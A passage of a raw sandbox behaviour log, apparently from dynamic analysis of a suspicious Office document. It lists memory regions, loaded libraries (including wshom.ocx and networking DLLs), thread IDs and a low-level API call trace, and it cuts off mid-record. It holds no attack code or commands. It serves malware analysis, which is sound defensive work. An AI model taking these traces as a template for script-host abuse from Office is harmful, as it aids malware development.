0x11b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b30000" filename = "" Region: id = 675 start_va = 0x11b40000 end_va = 0x11b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b40000" filename = "" Region: id = 676 start_va = 0x11b50000 end_va = 0x11b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b50000" filename = "" Region: id = 677 start_va = 0x11b60000 end_va = 0x11b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b60000" filename = "" Region: id = 678 start_va = 0x11b70000 end_va = 0x11b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b70000" filename = "" Region: id = 679 start_va = 0x11b80000 end_va = 0x11b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b80000" filename = "" Region: id = 680 start_va = 0x7fe70000 end_va = 0x7fe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fe70000" filename = "" Region: id = 681 start_va = 0x9f30000 end_va = 0x9f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009f30000" filename = "" Region: id = 682 start_va = 0x11b10000 end_va = 0x11b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b10000" filename = "" Region: id = 683 start_va = 0x11b20000 end_va = 0x11b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b20000" filename = "" Region: id = 684 start_va = 0x11b30000 end_va = 0x11b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b30000" filename = "" Region: id = 685 start_va = 0x11b40000 end_va = 0x11b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b40000" filename = "" Region: id = 686 start_va = 0x11b50000 end_va = 0x11b5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b50000" filename = "" Region: id = 687 start_va = 0x11b60000 end_va = 0x11b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b60000" filename = "" Region: id = 688 start_va = 0x11b70000 end_va = 0x11b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b70000" filename = "" Region: id = 689 start_va = 0x11b80000 end_va = 0x11b8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b80000" filename = "" Region: id = 690 start_va = 0x11b90000 end_va = 0x11b9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b90000" filename = "" Region: id = 691 start_va = 0x11ba0000 end_va = 0x11baffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011ba0000" filename = "" Region: id = 692 start_va = 0x11bb0000 end_va = 0x11bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bb0000" filename = "" Region: id = 693 start_va = 0x11b30000 end_va = 0x11be2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011b30000" filename = "" Region: id = 694 start_va = 0x71590000 end_va = 0x7179cfff monitored = 0 entry_point = 0x7167acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 695 start_va = 0x11bf0000 end_va = 0x11dc6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011bf0000" filename = "" Region: id = 696 start_va = 0x11dd0000 end_va = 0x11f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011dd0000" filename = "" Region: id = 697 start_va = 0x11fa0000 end_va = 0x11facfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011fa0000" filename = "" Region: id = 698 start_va = 0x11fb0000 end_va = 0x11fbcfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011fb0000" filename = "" Region: id = 699 start_va = 0x11fc0000 end_va = 0x11ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011fc0000" filename = "" Region: id = 700 start_va = 0x12000000 end_va = 0x120fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012000000" filename = "" Region: id = 701 start_va = 0x12100000 end_va = 0x12100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012100000" filename = "" Region: id = 702 start_va = 0x12110000 end_va = 0x12110fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 703 start_va = 0x71540000 end_va = 0x71551fff monitored = 0 entry_point = 0x71544510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 704 start_va = 0x71510000 end_va = 0x7153efff monitored = 0 entry_point = 0x7151bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 705 start_va = 0x71470000 end_va = 0x7150afff monitored = 0 entry_point = 0x714af7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 706 start_va = 0x76900000 end_va = 0x76906fff monitored = 0 entry_point = 0x76901e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 707 start_va = 0x68710000 end_va = 0x68722fff monitored = 0 entry_point = 0x687125d0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 708 start_va = 0x71420000 end_va = 0x7146efff monitored = 0 entry_point = 0x7142d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 709 start_va = 0x71410000 end_va = 0x71417fff monitored = 0 entry_point = 0x71411fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 710 start_va = 0x686f0000 end_va = 0x68703fff monitored = 0 entry_point = 0x686f3c10 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 711 start_va = 0x70a30000 end_va = 0x70ab3fff monitored = 0 entry_point = 0x70a56530 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 712 start_va = 0x68680000 end_va = 0x686e7fff monitored = 0 entry_point = 0x686a70a0 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 713 start_va = 0x11480000 end_va = 0x1148ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011480000" filename = "" Region: id = 714 start_va = 0x11490000 end_va = 0x114cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011490000" filename = "" Region: id = 715 start_va = 0x114d0000 end_va = 0x115cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000114d0000" filename = "" Region: id = 716 start_va = 0x115d0000 end_va = 0x115d2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mswsock.dll.mui") Region: id = 717 start_va = 0x6fa30000 end_va = 0x6fa37fff monitored = 0 entry_point = 0x6fa31920 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 718 start_va = 0x6f9e0000 end_va = 0x6fa26fff monitored = 0 entry_point = 0x6f9f58d0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 719 start_va = 0x6f970000 end_va = 0x6f9d3fff monitored = 0 entry_point = 0x6f98afd0 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\SysWOW64\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll") Region: id = 720 start_va = 0x115e0000 end_va = 0x1161ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000115e0000" filename = "" Region: id = 721 start_va = 0x11620000 end_va = 0x1171ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011620000" filename = "" Region: id = 722 start_va = 0x11720000 end_va = 0x11722fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011720000" filename = "" Region: id = 723 start_va = 0x11730000 end_va = 0x1173cfff monitored = 0 entry_point = 0x11737b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 724 start_va = 0x6f960000 end_va = 0x6f96ffff monitored = 0 entry_point = 0x6f964600 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\SysWOW64\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll") Region: id = 725 start_va = 0x11730000 end_va = 0x1173cfff monitored = 0 entry_point = 0x11737b50 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\SysWOW64\\wshom.ocx" (normalized: "c:\\windows\\syswow64\\wshom.ocx") Region: id = 726 start_va = 0x6f940000 end_va = 0x6f95ffff monitored = 0 entry_point = 0x6f94d120 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\SysWOW64\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll") Region: id = 727 start_va = 0x6f910000 end_va = 0x6f93bfff monitored = 0 entry_point = 0x6f92bb10 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\SysWOW64\\ntasn1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll") Region: id = 728 start_va = 0x9bb0000 end_va = 0x9bb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bb0000" filename = "" Region: id = 729 start_va = 0x9bb0000 end_va = 0x9beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bb0000" filename = "" Region: id = 730 start_va = 0x9bf0000 end_va = 0x9ceffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009bf0000" filename = "" Region: id = 731 start_va = 0x11720000 end_va = 0x1181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011720000" filename = "" Region: id = 732 start_va = 0x6f8f0000 end_va = 0x6f909fff monitored = 0 entry_point = 0x6f8ffa70 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\SysWOW64\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll") Region: id = 733 start_va = 0x9cf0000 end_va = 0x9cf9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\crypt32.dll.mui") Region: id = 734 start_va = 0x68640000 end_va = 0x6867afff monitored = 0 entry_point = 0x686556aa region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\msproof7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\msproof7.dll") Region: id = 735 start_va = 0x68530000 end_va = 0x68639fff monitored = 0 entry_point = 0x68591e10 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\SysWOW64\\webservices.dll" (normalized: "c:\\windows\\syswow64\\webservices.dll") Region: id = 736 start_va = 0x9d00000 end_va = 0x9d00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "custom.dic" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\custom.dic") Region: id = 737 start_va = 0x6f8e0000 end_va = 0x6f8e7fff monitored = 0 entry_point = 0x6f8e1d70 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 738 start_va = 0x684e0000 end_va = 0x68528fff monitored = 0 entry_point = 0x684e6450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 739 start_va = 0x9d00000 end_va = 0x9d01fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d00000" filename = "" Region: id = 740 start_va = 0x9d10000 end_va = 0x9d10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009d10000" filename = "" Region: id = 741 start_va = 0x11820000 end_va = 0x1182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 742 start_va = 0x11830000 end_va = 0x11830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011830000" filename = "" Region: id = 743 start_va = 0x11820000 end_va = 0x1182ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 744 start_va = 0x11840000 end_va = 0x11935fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 745 start_va = 0x12120000 end_va = 0x12611fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000012120000" filename = "" Region: id = 746 start_va = 0x11820000 end_va = 0x11821fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 747 start_va = 0x11940000 end_va = 0x11941fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011940000" filename = "" Region: id = 748 start_va = 0x11950000 end_va = 0x11951fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011950000" filename = "" Region: id = 749 start_va = 0x11960000 end_va = 0x11961fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011960000" filename = "" Region: id = 750 start_va = 0x11dd0000 end_va = 0x11f70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cambria.ttc" filename = "\\Windows\\Fonts\\cambria.ttc" (normalized: "c:\\windows\\fonts\\cambria.ttc") Region: id = 751 start_va = 0x11970000 end_va = 0x11972fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011970000" filename = "" Region: id = 752 start_va = 0x11f80000 end_va = 0x11f80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f80000" filename = "" Region: id = 753 start_va = 0x11970000 end_va = 0x11971fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011970000" filename = "" Region: id = 754 start_va = 0x11f80000 end_va = 0x11f81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f80000" filename = "" Region: id = 755 start_va = 0x11f90000 end_va = 0x11f91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f90000" filename = "" Region: id = 756 start_va = 0x12100000 end_va = 0x12101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012100000" filename = "" Region: id = 757 start_va = 0x12620000 end_va = 0x12621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012620000" filename = "" Region: id = 758 start_va = 0x12630000 end_va = 0x12631fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012630000" filename = "" Region: id = 759 start_va = 0x12640000 end_va = 0x12641fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012640000" filename = "" Region: id = 760 start_va = 0x12650000 end_va = 0x12651fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012650000" filename = "" Region: id = 761 start_va = 0x12660000 end_va = 0x12753fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 762 start_va = 0x12760000 end_va = 0x12761fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012760000" filename = "" Region: id = 763 start_va = 0x12770000 end_va = 0x12771fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012770000" filename = "" Region: id = 764 start_va = 0x12780000 end_va = 0x12781fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012780000" filename = "" Region: id = 765 start_va = 0x12790000 end_va = 0x12791fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012790000" filename = "" Region: id = 766 start_va = 0x127a0000 end_va = 0x127a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000127a0000" filename = "" Region: id = 767 start_va = 0x127b0000 end_va = 0x127b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000127b0000" filename = "" Region: id = 768 start_va = 0x127c0000 end_va = 0x127c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000127c0000" filename = "" Region: id = 769 start_va = 0x68450000 end_va = 0x684dffff monitored = 0 entry_point = 0x68457345 region_type = mapped_file name = "msspell7.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msspell7.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msspell7.dll") Region: id = 770 start_va = 0x683e0000 end_va = 0x68443fff monitored = 0 entry_point = 0x683e68c8 region_type = mapped_file name = "msgr8en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\1033\\MSGR8EN.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\1033\\msgr8en.dll") Region: id = 771 start_va = 0x127d0000 end_va = 0x12957fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 772 start_va = 0x68370000 end_va = 0x683d7fff monitored = 0 entry_point = 0x6837c3f5 region_type = mapped_file name = "mscss7en.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7en.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7en.dll") Region: id = 773 start_va = 0x9d00000 end_va = 0x9d00fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "excludedictionaryen0409.lex" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\UProof\\ExcludeDictionaryEN0409.lex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\uproof\\excludedictionaryen0409.lex") Region: id = 774 start_va = 0x682e0000 end_va = 0x68362fff monitored = 0 entry_point = 0x682efbe4 region_type = mapped_file name = "css7data0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\CSS7DATA0009.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\css7data0009.dll") Region: id = 775 start_va = 0x12960000 end_va = 0x12ae7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\mssp7en.lex") Region: id = 776 start_va = 0x12af0000 end_va = 0x1304bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\NL7MODELS0009.dll" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\nl7models0009.dll") Region: id = 777 start_va = 0x9d00000 end_va = 0x9d02fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7cm_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7cm_en.dub") Region: id = 778 start_va = 0x13050000 end_va = 0x1306afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\mscss7wre_en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\mscss7wre_en.dub") Region: id = 779 start_va = 0x9d10000 end_va = 0x9d10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009d10000" filename = "" Region: id = 780 start_va = 0x11820000 end_va = 0x1182efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000011820000" filename = "" Region: id = 781 start_va = 0x11950000 end_va = 0x1195efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011950000" filename = "" Region: id = 782 start_va = 0x11970000 end_va = 0x1197ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011970000" filename = "" Region: id = 783 start_va = 0x11f90000 end_va = 0x11f9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f90000" filename = "" Region: id = 784 start_va = 0x12620000 end_va = 0x1262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012620000" filename = "" Region: id = 785 start_va = 0x11820000 end_va = 0x11820fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011820000" filename = "" Region: id = 786 start_va = 0x11f90000 end_va = 0x11f91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000011f90000" filename = "" Region: id = 787 start_va = 0x12620000 end_va = 0x12622fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012620000" filename = "" Region: id = 788 start_va = 0x12640000 end_va = 0x12641fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012640000" filename = "" Region: id = 789 start_va = 0x12760000 end_va = 0x12760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012760000" filename = "" Region: id = 790 start_va = 0x12780000 end_va = 0x12781fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000012780000" filename = "" Region: id = 791 start_va = 0x13070000 end_va = 0x13071fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013070000" filename = "" Region: id = 792 start_va = 0x13090000 end_va = 0x13091fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013090000" filename = "" Region: id = 793 start_va = 0x130b0000 end_va = 0x130b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000130b0000" filename = "" Region: id = 794 start_va = 0x130d0000 end_va = 0x130d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000130d0000" filename = "" Region: id = 795 start_va = 0x130f0000 end_va = 0x130f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000130f0000" filename = "" Region: id = 796 start_va = 0x13110000 end_va = 0x13111fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013110000" filename = "" Region: id = 797 start_va = 0x13120000 end_va = 0x13921fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.lex" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\MSGR8EN.LEX" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.lex") Region: id = 798 start_va = 0x12620000 end_va = 0x12620fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msgr8en.dub" filename = "\\Program Files (x86)\\Microsoft Office\\Office16\\PROOF\\msgr8en.dub" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\proof\\msgr8en.dub") Region: id = 799 start_va = 0x13930000 end_va = 0x139e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000013930000" filename = "" Region: id = 800 start_va = 0x139f0000 end_va = 0x13a95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000139f0000" filename = "" Thread: id = 1 os_tid = 0x1274 Thread: id = 2 os_tid = 0x1244 Thread: id = 3 os_tid = 0x1248 Thread: id = 4 os_tid = 0x1240 Thread: id = 5 os_tid = 0x123c Thread: id = 6 os_tid = 0x1234 Thread: id = 7 os_tid = 0x1230 Thread: id = 8 os_tid = 0x122c Thread: id = 9 os_tid = 0x1228 Thread: id = 10 os_tid = 0x1224 Thread: id = 11 os_tid = 0x1220 Thread: id = 12 os_tid = 0x121c Thread: id = 13 os_tid = 0x1218 Thread: id = 14 os_tid = 0x1210 Thread: id = 15 os_tid = 0x120c [0113.151] DispCallFunc (pvInstance=0xb3b5e44, oVft=0x1c, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x198170) returned 0x0 [0113.151] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x695d11d3, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x198080 | out: lpThreadId=0x198080*=0x1360) returned 0xbbc [0113.152] PeekMessageA (in: lpMsg=0x198060, hWnd=0x203ae, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x198060) returned 0 [0113.250] NtdllDefWindowProc_A (hWnd=0x203ae, Msg=0x1c, wParam=0x0, lParam=0x9f8) returned 0x0 [0113.260] GetActiveWindow () returned 0x0 [0113.261] CRetailMalloc_Alloc () returned 0xcaffc60 [0113.261] CRetailMalloc_Realloc () returned 0xc8cf490 [0113.262] CRetailMalloc_Alloc () returned 0xc96d968 [0113.262] CRetailMalloc_Realloc () returned 0xb3a5180 [0113.262] memcpy (in: _Dst=0x197a00, _Src=0x197a28, _Size=0x4 | out: _Dst=0x197a00) returned 0x197a00 [0113.262] realloc (_Block=0x0, _Size=0x100) returned 0xb754f48 [0113.262] memcpy (in: _Dst=0xb754f48, _Src=0x197a00, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.262] memcpy (in: _Dst=0x197a10, _Src=0x197a44, _Size=0xc | out: _Dst=0x197a10) returned 0x197a10 [0113.262] realloc (_Block=0x0, _Size=0x60) returned 0xb755050 [0113.262] memcpy (in: _Dst=0xb755050, _Src=0x197a10, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb318054, cbMultiByte=9, lpWideCharStr=0x11460418, cchWideChar=20 | out: lpWideCharStr="PHXAHYD7V") returned 9 [0113.262] CRetailMalloc_Realloc () returned 0xcada828 [0113.263] memcpy (in: _Dst=0xcadc7a0, _Src=0x11460414, _Size=0x18 | out: _Dst=0xcadc7a0) returned 0xcadc7a0 [0113.263] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.263] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.263] memcpy (in: _Dst=0xb754f48, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.263] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2ea6, cbMultiByte=7, lpWideCharStr=0x197658, cchWideChar=6 | out: lpWideCharStr="Value") returned 0 [0113.263] CRetailMalloc_Realloc () returned 0xcadb518 [0113.263] wcscpy_s (in: _Destination=0xcadc7bc, _SizeInWords=0x6, _Source="Value" | out: _Destination="Value") returned 0x0 [0113.263] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.263] CRetailMalloc_Realloc () returned 0xf5b3108 [0113.263] memcpy (in: _Dst=0xb754f48, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.264] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.273] memcpy (in: _Dst=0x197904, _Src=0x197978, _Size=0x8 | out: _Dst=0x197904) returned 0x197904 [0113.273] memcpy (in: _Dst=0xcb069d8, _Src=0x197904, _Size=0x8 | out: _Dst=0xcb069d8) returned 0xcb069d8 [0113.273] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0113.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb318084, cbMultiByte=11, lpWideCharStr=0x11461618, cchWideChar=24 | out: lpWideCharStr="rZTrpEel9oQ") returned 11 [0113.273] memcpy (in: _Dst=0xcadc7cc, _Src=0x11461614, _Size=0x1c | out: _Dst=0xcadc7cc) returned 0xcadc7cc [0113.273] memcpy (in: _Dst=0xb754f48, _Src=0x197a5c, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.274] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.274] memcpy (in: _Dst=0xb754f48, _Src=0x197894, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0113.274] memcpy (in: _Dst=0xb754f48, _Src=0x197a28, _Size=0x4 | 